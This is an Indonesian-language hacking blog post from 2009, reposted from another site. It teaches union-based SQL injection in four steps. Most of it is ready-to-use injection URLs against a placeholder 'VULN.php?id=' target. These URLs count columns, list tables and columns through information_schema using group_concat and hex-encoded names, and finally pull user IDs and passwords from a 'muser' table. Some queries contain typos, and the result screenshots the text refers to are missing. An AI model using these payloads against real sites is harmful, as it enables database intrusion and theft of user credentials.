------------------------------------------------------
Author : ^k4c0n9^
Contact : mafiaexc@yahoo.com ==> http://WWW.MAHANATHAN.BLOGSPOT.COM
Copyright (c) 2009 www.mahanathan.blogspot.com All Rights Reserved
19/05/2009 02:45:00 WIB
------------------------------------------------------
dikutip dari : http://xshadow-power.com
Berikut saya akan menerangkan SQLinjection dengan 4 langkah.
Yang saya akan bahas disini bagaimana mencari/membaca table serta column dengan cepat… dengan query “group”
Concept:
- mencari nomor togel
- membaca table
- membaca column table
- result
teknik:
- mencari nomor togel
saya rasa rekan-rekan sudah tau cara mencari nomer togel… jadi tidak usah saya bahas disini…
example:
http://127.0.0.1/VULN.php?id=-199+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
dan diketahui nomer togelnya sebagai berikut:
- membaca table
berikut cara query “group” untuk membaca table
query yang digunakan sebagai berikut:
group_concat(table_name)
code diatas dimasukkan di salah satu nomer togel dan dibelakang url ditambahkan emblem berikut untuk membaca table dalam database:
+from+information_schema.tables+where+table_schema=database()--
Example:
http://127.0.0.1/VULN.php?id=-199+union+select+1,2,3,4 5, group_concat(table_name),7,8,9,10,11,12+from+information_schema.tables+where+tables_chema=database()--
dimana query diatas dimasukkan di nomer togel 6
kemudian munculah table database secara berurutan sebagai berikut:
- membaca column table
setelah didapatkan nama table, kita akan membaca column dari table yang kita dapat dengan query sebagai berikut:
group_concat(column_name)
dan emblem yang disertakan pada belakang url sebagai berikut ini:
+from+information_schema.columns+where+table_name=CODE EQUIVALENT HEX VALUE Table
Dimana “CODE EQUIVALENT HEX VALUE Table” didapatkan dari convert “STRING àEQUIVALENT HEX VALUE”
Dan saya biasa menggunakan tools berikut: http://xshadow-power.com/tools
Dan pada gambar sebelumnya… table yang akan kit baca columnya adalah “muser” dan telah didapatkan dari hasil confert dari muser adalah 0x6D75736572
Example:
http://127.0.0.1/VULN.php?id=-199+union+select+1,2,3,4 5, group_concat(column_name),7,8,9,10,11,12 +from+information_schema.columns+where+table_name=0x6D75736572--
dan result yang didapatkan dari query ini sebagai berikut:
- result
setelah mendapatkan apa yang kita cari pada langkah 2 & 3 diatas… sa’atnya membaca ISI dari column dari table muser yaitu “uid,pass”
query yang digunakan sebagai berikut:
concat_ws(nama column yang akan dibaca)
dan ditambahkan emblem dibelakang url sebagi berikut
+from+nama column table yang akan dibaca--
Example:
http://127.0.0.1/VULN.php?id=-1107+union+select+1,2,3,4,5,concat_ws(0x3a,uid,pwd),7,8,9,10,11,12+from+muser--
dan result dari yang kita baca diatas sebagai berikut:
Akhirnya selesai juga tutorialnya J
Sekian saja… terima kasih.
Cacian, makian, saran, kritik mohon dilayangkan ke email berikut: admin[at]cukdus[dot]org
Regard
Xshadow
No greetzz
Only thanks to:
Inc0mp13te, IndoUnderground, cyber_tomat, gblack, k0il, jack-, X-Code community, CukDu$ community, dan temen2 yang lupa namanya lom saya sebutkan hehehe…
Tidak ada komentar:
Posting Komentar